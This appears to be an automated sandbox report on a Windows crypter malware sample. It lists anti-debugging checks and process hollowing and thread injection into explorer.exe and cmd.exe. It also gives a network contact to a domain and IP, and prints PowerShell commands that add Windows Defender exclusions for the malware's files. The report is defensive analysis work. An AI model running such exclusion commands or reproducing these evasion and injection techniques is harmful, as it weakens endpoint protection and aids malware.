            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B23A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B18A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1A5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B94257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45DBF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45DBF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B335A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03591 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B095F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B095F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B93DE3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B395EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBFDD3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B86DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B015C1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B13D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B8A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC3518 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09515 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0751A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BACD04 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B28D76 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B27D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44D51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44D51 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBFD52 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B43D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0354C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0354C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB8D47 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04CB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B134B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B134B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B964B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B964B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD9CB3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B114A9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B114A9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B934A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B934A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B934A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B49860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.somethingyourselves.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.193.185.8 80
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread register set: target process: 3528
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3528
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
